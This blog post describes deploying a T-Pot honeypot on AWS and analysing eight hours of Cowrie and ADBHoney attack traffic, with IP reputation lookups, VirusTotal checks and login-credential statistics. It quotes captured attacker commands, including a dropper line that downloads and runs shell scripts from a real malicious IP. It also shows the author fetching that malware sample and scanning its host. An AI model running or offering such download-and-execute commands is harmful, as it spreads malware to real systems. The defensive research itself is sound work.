8 Hours Honeypot: Cowrie and Adbhoney

Mahbuba Shahrin
12 min read · Feb 9, 2022


My team and I had used Telekom Security’s “Tpotce” project to set up a honeypot on Amazon Web Services (AWS) because it covers everything you could need to do basic threat intelligence.

A container where honey is kept is a Honeypot, but this is not the Honeypot we are talking about.
In cybersecurity, a honeypot is a mechanism that uses a manufactured attack target to lure cybercriminals away from legitimate targets, and gathers intelligence about the identity, methods and motivations of adversaries.

We first had to build the honeypot:

We logged into our AWS account and created an instance in the EC2 console. One of my team members, Tim Chan, chose Northern California while I chose Northern Virginia. At the end we compared the East with the West to see how the gathered information and data differed and to learn from our findings.

In the AWS Marketplace, we chose Debian 10 Buster as the Amazon Machine Image (AMI) and t2.xlarge as the instance type when configuring the details, because the instance will need to handle both the ELK stack that we use to monitor the attacks and the many honeypots running in Docker containers. The storage needed was at least 128 GB of general-purpose SSD (SSD2).

ELK stack = an acronym for a combination of three widely used open source projects, Elasticsearch, Logstash and Kibana, usually deployed together with Beats.

Once the instance has been created, connect to it using Secure Shell (SSH). More information on how to create an EC2 instance can be found here.

After SSH-ing to the instance, in the Linux terminal, make sure to update, upgrade and then install git:

sudo apt update
sudo apt upgrade
sudo apt install git

Check out git --help for the git documentation, which provides the synopsis of the git command and a list of the most commonly used Git commands.

Clone the tpotce repository, cd into it and run the install script:

git clone https://github.com/telekom-security/tpotce.git
cd tpotce
./install.sh --type=user

In the installer, you will be prompted to provide/create a username and password; save that information because you will need it each time you log in. In addition, choose the “STANDARD” configuration when prompted by the next window/box that pops up in the terminal.

After you have completed everything above, update the security group of your honeypot instance in AWS by selecting Security and then Edit Inbound Rules. You will add 3 rules of type Custom TCP; the protocol should be TCP for all, and the Source should be Custom for all. One rule should have the Port range 64295, the second 64297, and the third the range 1–64000. For the rule with Port range 64295, enter the AWS instance public IP address and the description “SSH for administrators”. For the rule with Port range 64297, enter the AWS instance public IP address and the description “Web Administrator”. Lastly, the rule with Port range 1–64000 should have the source 0.0.0.0/0 and the description “let the adversaries in.”

After completing the inbound rules, you should be able to log in with SSH on port 64295 and reach the web admin portal on port 64297.
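As an added example (not from the post or the T-Pot project), here is a small check for the inbound-rule layout just described: the two administrative ports must not be reachable from 0.0.0.0/0, while the honeypot range 1–64000 must be. The rule entries are constructed to mirror the three rules above; the administrator source address 203.0.113.10/32 is an assumed placeholder.

```python
# Added example: validate T-Pot security-group inbound rules (constructed
# data; not T-Pot code). ADMIN_CIDR is a placeholder for the admin address.
from ipaddress import ip_network

ADMIN_PORTS = {64295: "SSH for administrators", 64297: "Web Administrator"}
HONEYPOT_RANGE = (1, 64000)
ADMIN_CIDR = "203.0.113.10/32"  # placeholder, assumed

# The three rules from the post, as constructed dictionaries
RULES = [
    {"proto": "tcp", "from": 64295, "to": 64295, "cidr": ADMIN_CIDR},
    {"proto": "tcp", "from": 64297, "to": 64297, "cidr": ADMIN_CIDR},
    {"proto": "tcp", "from": 1, "to": 64000, "cidr": "0.0.0.0/0"},
]

def is_world_open(cidr):
    """True for 0.0.0.0/0 (or ::/0): any source on the internet."""
    return ip_network(cidr, strict=False).prefixlen == 0

def check_rules(rules):
    """Return a list of findings; an empty list means the layout is sound."""
    findings = []
    honeypot_open = False
    admin_reachable = set()
    for r in rules:
        lo, hi, cidr = r["from"], r["to"], r["cidr"]
        if r["proto"] != "tcp":
            findings.append(f"unexpected protocol {r['proto']} on {lo}-{hi}")
            continue
        for port, role in ADMIN_PORTS.items():
            if lo <= port <= hi:
                if is_world_open(cidr):
                    findings.append(f"{role} port {port} is open to {cidr}")
                else:
                    admin_reachable.add(port)
        # the honeypot range must be fully covered by a world-open rule
        if lo <= HONEYPOT_RANGE[0] and hi >= HONEYPOT_RANGE[1] and is_world_open(cidr):
            honeypot_open = True
    for port, role in ADMIN_PORTS.items():
        if port not in admin_reachable:
            findings.append(f"{role} port {port} has no restricted-source rule")
    if not honeypot_open:
        findings.append("honeypot range 1-64000 is not reachable from 0.0.0.0/0")
    return findings

if __name__ == "__main__":
    print(check_rules(RULES) or "inbound rules look sound")
```

A common mistake the check catches is opening 1–65535 to the world, which also exposes the two admin ports.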

If you are looking for an alternative method of understanding how to “Create a Honeypot”, please check out the link here.

PROJECT

For this project, we used SpiderFoot, a tool that allows users to collect OSINT from multiple sources, sort the data, and investigate the findings from a single platform. We also used these APIs: Shodan, VirusTotal, and AlienVault.

COWRIE:

Our team was tasked with analyzing all attacks on the honeypots over a period of 8 hours. We analyzed 8 hours of Cowrie honeypot traffic to see whether any patterns were visible.

Cowrie = Not the marine mollusk, but a medium-interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by an attacker.

So far, the dashboard reveals a total of 9,075 attacks from 59 unique source IP addresses. There is a high concentration of attacks from China, the United States, and Japan.

We looked at what the attackers were doing once they had access and which commands they ran, and noticed that some attackers performed reconnaissance on the operating system and architecture, but in this specific timeframe most tried to upload malicious payloads. Some of the attacks looked the same even though they came from different nations.

In the T-Pot web console, the Kibana app has the Cowrie Dashboard, which shows a high-level overview of an absolute 8-hour period on February 8, 2022, from 6:30am to 2:30pm. I chose the source IP with the largest count: 43.134.209.220. The IP 43.154.200.191 also has 258 counts and similar information to 43.134.209.220; it is also part of Tencent Cloud, a company shown as being in Hong Kong.

When clicking the link for the highest source IP address, I am forwarded to Cisco Talos Intelligence, which is a reputation lookup service.

There are no associated IP addresses from the same subnet:

Checked the WHOIS plugin for more information such as the Domain Name and Owner:

The netname is ACEVILLEPTELDTD-SG. The address shows 16 Collyer Quay, #18–29, Income at Raffles, Singapore. Although the location data shows up as HK for Central, Hong Kong, a simple Google search revealed that Aceville Pte. Ltd is a private company limited by shares, incorporated in Singapore.

ADBHoney

adbhoney = The Android Debug Bridge (ADB) is a protocol designed to keep track of both emulated and real phones/TVs/DVRs connected to a given host. ADBHoney is a low-interaction honeypot designed for ADB over TCP/IP. The T-Pot platform includes the ELK stack to visualize all the data collected and SpiderFoot to automate the OSINT process.

The attacker IP address in this scenario is 141.98.10.25.

The command line input is:

cd /data/local/tmp/; busybox wget http://209.141.33.122/w.sh; sh w.sh; curl http://209.141.33.122/c.sh; sh c.sh

We took a look at the first file attempt, w.sh, by going to the VirusTotal website and scanning the URL http://209.141.33.122/w.sh for interesting information.

Some security companies such as CyRadar and Trustwave had flagged this website as Malicious, while Sophos, Kaspersky, Emsisoft, and Abusix had flagged it as Malware.

When we used the reconnaissance tool SpiderFoot to analyze the attacker IP address, we were able to see that this IP address comes from a known malicious subnet.

Based on the data, there are 394 total data elements of type Blacklisted IP on Same Subnet.

And, when checking the details of the Blacklisted IP on the Same Subnet entries, we can see that the IP address goes from a Recent Spammer to a Brute Force Attacker.

SORBS = Spam and Open Relay Blocking System provides free access to its DNS-based Block List (DNSBL) to effectively block email from more than 12 million host servers known to disseminate spam, phishing attacks and other forms of malicious email. The list typically includes email servers suspected of sending or relaying spam, servers that have been hacked and hijacked, and those with Trojan infestations.

UCEPROTECT = a DNS blacklisting service that is composed of three distinct zones: dnsbl-1.uceprotect.net, dnsbl-2.uceprotect.net, and dnsbl-3.uceprotect.net. Each zone has different listing criteria, all of which are extremely important to understand before using any zone within the service.

dronebl.org (DroneBL) is a realtime monitor of abusable IPs, which has the goal of stopping abuse of infected machines. This adversary is trying to download malware, attempting to exploit the system.

Customizing your Cowrie honeypot

In the Kibana Discover tab, the data is filtered to 8 hours, to Cowrie, and to occurrences in which commands were run.

The 8-hour analysis shows that at 10am there were 113 attacks and by the time it reached 3:30pm there were 322 attacks.

Checked out the source IP address 43.154.190.224 because it has the most hits; to find interesting information, viewed the table, scrolled to the input section of the data, and found that attackers had tried different methods of exploitation. Looking at the snip below, we can see that the data is chronological; based on the analysis of the attackers’ IP addresses and the commands they ran, the attackers tried to:

remove a hidden file, “.s”, and then exit. They tried to use BusyBox to interact with the operating system.

BusyBox is a program that can perform the actions of many common UNIX programs, such as ls, chmod, wget, cat, etc. Most commonly, it’s used in embedded Linux due to its small executable size (Ryan Cheu).

The attackers added an acronym at the end of the directory name: UJLDG. Googled UJLDG and found that the results were all in French. Google translated Union des Jeunes Leaders du Departement de Gohitafla, which turns out to mean “Union of Young Leaders of the Department of Gohitafla.” Did another Google search on where Gohitafla is located, and the result shows it’s a town in central Ivory Coast, a former French colony in West Africa where people do speak French. With BusyBox, they were able to use commands to find out interesting information about my system, such as when they tried to use the dd tool, a built-in command-line utility that can transfer data from one drive to another while making sure that the data itself is not changed.

dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s

I haven’t seen any files containing malware because the attacker is still at the initial stage, trying to gather information; they changed their own UNIX password and then tried to change their own password in Bash.
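As an added example (not the post’s own code), here is a small decomposition of a recorded command line into the indicators a defender wants from it: the individual commands, the download URLs, the scripts executed and the files read. The two inputs are the ADBHoney command line and the Cowrie dd/cat line quoted above; the list of download tools to watch for is an assumption.

```python
# Added example (not from the post): decompose a recorded honeypot command
# line into indicators. The two inputs are the command lines quoted above.
import re
import shlex

ADB_INPUT = ("cd /data/local/tmp/; busybox wget http://209.141.33.122/w.sh; "
             "sh w.sh; curl http://209.141.33.122/c.sh; sh c.sh")
COWRIE_INPUT = "dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s"

FETCHERS = {"wget", "curl", "tftp", "ftpget"}   # download tools to watch for (assumed list)
URL_RE = re.compile(r"https?://[^\s;'\"]+")

def split_commands(line):
    """Split a shell line on the ; && and || separators."""
    return [c.strip() for c in re.split(r";|&&|\|\|", line) if c.strip()]

def analyse(line):
    """Return programs run, URLs fetched, scripts executed and files read."""
    result = {"commands": split_commands(line), "programs": [],
              "urls": [], "scripts": [], "files": []}
    for cmd in result["commands"]:
        try:
            argv = shlex.split(cmd)
        except ValueError:          # unbalanced quotes in attacker input
            argv = cmd.split()
        if not argv:
            continue
        if argv[0] == "busybox" and len(argv) > 1:
            argv = argv[1:]         # 'busybox wget' runs the wget applet
        prog = argv[0]
        result["programs"].append(prog)
        if prog in FETCHERS:
            result["urls"].extend(URL_RE.findall(cmd))
        elif prog in ("sh", "bash") and len(argv) > 1:
            result["scripts"].append(argv[-1])
        elif prog == "dd":
            result["files"].extend(a[3:] for a in argv[1:] if a.startswith("if="))
        elif prog == "cat":
            result["files"].extend(argv[1:])
    return result

if __name__ == "__main__":
    for line in (ADB_INPUT, COWRIE_INPUT):
        print(analyse(line))
```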

We ran a query against an IP reputation checker, Talos Intelligence, using the IP address 43.154.190.224, which shows that the Location Data is Central, Hong Kong, the Email Reputation is Poor, the Spam Level is Critical, and the Network Owner is Tencent Cloud Computing. Googled “tencent cloud computing”:

and selected the link from scamalytics.com, which showed the Network Owner to be a potentially low fraud risk Internet Service Provider (ISP), by which we mean that web traffic from this ISP potentially poses a low risk of being fraudulent. Surprisingly, they also manage IP addresses for organizations including Aceville Pte. Ltd, which was the initial find for the IP address examined before this one, the most-hit source IP. The other subnet address associated with 43.154.190.224 is 43.154.190.185; the Email Reputation for 43.154.190.185 shows that it is Untrusted.

Analysis of commands run: Adbhoney

This data shows how the count of hits increased by 4 from 12:10pm to 1:40pm.

Not much activity, as expected, except for a file w.sh which was found with src.ip=141.98.10.25. I became curious about the file and wanted to see what was in it, so I checked it out.

MALWARE ANALYSIS

I opened up my Metasploitable VM and downloaded the file using the command wget http://209.141.33.122/w.sh. I made sure my internet was turned off before checking what was inside the file.

“Hitme”, the alias of the adversary, was setting up all the malicious files with full permissions to execute them. They used the APK BusyBox installer for Android. This version of the installer combines various versions of different UNIX tools in one app that you can install on your Android device with just a few taps. It looked like Hitme could be a script kiddie.

APK = Android Package, a file format created by Google.

I wanted to check out this IP address, 141.98.10.25, so I ran a query against an IP reputation checker using Talos. The result shows that the IP address’ Location Data is Lithuania, the Email Reputation is Poor, and the Spam Level is Critical. In addition, there were 253 results of Top IP Addresses used to send emails in 141.98.10.25/24. Some of the Email Reputations were untrusted and most were neutral.

I also uploaded this file, http://209.141.33.122/w.sh, to VirusTotal to see what information I could find; the result was that the file is malicious and malware.

As shown in the pictograph, the file is obviously malware.

Did a quick nmap scan on the IP address hosting the file using the command:

sudo nmap -Pn -sV -O -A -v 209.141.33.122

and the only 2 ports discovered so far were 80/tcp and 3306/tcp. I also checked the IP address in the URL bar and this screenshot was the result:

TROJAN:

When looking at Cowrie’s Top URI Downloads, we can see a T-Pot path which has a file hash that’s interesting.

I looked up the file hash on VirusTotal and found a lot of interesting information about it. Multiple vendors had tagged this hash as a Trojan.

USERNAME AND PASSWORD ANALYSIS

This is a data table chart with the values of usernames, passwords, and count of records from the Cowrie honeypot. There are some interesting patterns, and these are the top usernames used for login attempts.

However, when adding information about passwords, a different result shows all the passwords tried for each username:

For the username admin, the passwords are much simpler; for root, the passwords tend to be more complicated. On the other hand, only the first 3 password values for root look as if they could easily be brute forced.
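As an added example (not the post’s or T-Pot’s own code), here is a small aggregation over Cowrie’s JSON log that reproduces the views used throughout this analysis: hits per source IP as in the dashboard, the username/password table above, events per hour, and the commands run per attacker IP. The log lines are constructed for illustration; the field names follow Cowrie’s cowrie.json output.

```python
# Added example (not from the post): aggregate Cowrie's JSON log into the
# views used in this analysis. Log lines are constructed; field names
# follow Cowrie's cowrie.json output.
import json
from collections import Counter

SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"43.154.190.224","timestamp":"2022-02-08T10:01:12.000000Z","session":"a1"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"43.154.190.224","timestamp":"2022-02-08T10:01:13.000000Z","session":"a1"}
{"eventid":"cowrie.login.failed","username":"root","password":"admin","src_ip":"43.154.190.224","timestamp":"2022-02-08T10:01:14.000000Z","session":"a1"}
{"eventid":"cowrie.login.success","username":"root","password":"password","src_ip":"43.154.190.224","timestamp":"2022-02-08T10:01:15.000000Z","session":"a1"}
{"eventid":"cowrie.command.input","input":"rm -rf .s; exit","src_ip":"43.154.190.224","timestamp":"2022-02-08T10:01:16.000000Z","session":"a1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"141.98.10.25","timestamp":"2022-02-08T11:30:00.000000Z","session":"b2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","src_ip":"141.98.10.25","timestamp":"2022-02-08T11:31:00.000000Z","session":"b2"}
"""
LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")

def parse_events(text):
    """One JSON object per line; truncated or malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events

def top_src_ips(events, n=10):
    """Hits per source IP, like the dashboard's top source IP list."""
    return Counter(e["src_ip"] for e in events if "src_ip" in e).most_common(n)

def credential_table(events):
    """(username, password) -> number of login attempts."""
    return Counter((e["username"], e["password"])
                   for e in events if e.get("eventid") in LOGIN_EVENTS)

def events_per_hour(events):
    """Events bucketed by UTC hour (timestamp prefix 'YYYY-MM-DDTHH')."""
    return Counter(e["timestamp"][:13] for e in events if "timestamp" in e)

def commands_by_ip(events):
    """Command inputs grouped by attacker IP, in log order."""
    out = {}
    for e in events:
        if e.get("eventid") == "cowrie.command.input":
            out.setdefault(e["src_ip"], []).append(e["input"])
    return out
```

On a real T-Pot host the same functions can be pointed at the Cowrie container’s cowrie.json instead of the embedded sample.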

DEBRIEF

As you can see, we used T-Pot, which is based on the Debian network installer, with the honeypot daemons and other helpful components dockered (Docker being the persistent process that manages containers). This permits T-Pot to run several honeypot daemons and tools on the same network interface while retaining a small footprint and confining each honeypot within its own environment.

Daemon = a computer program that runs as a background process, rather than being under the direct control of an interactive user.

Deploying and integrating honeypots into an existing infrastructure effectively can be a demanding task that requires enough preparation. Still, the benefits are apparent if done correctly. Honeypots enable faster alerting and a preventative view into current attacker tactics and automated attacks compared with publicly accessible infrastructure, and they reduce the volume of manual work done by analysts. Combined with pervasive log collection and well-made dashboards, this supports improved defensive tactics and methods against new incidents.

If you like the content here, you’ll also enjoy reading the post by one of my team members, Justin Hooper: Honeypot OSINT. Thank you for reading.
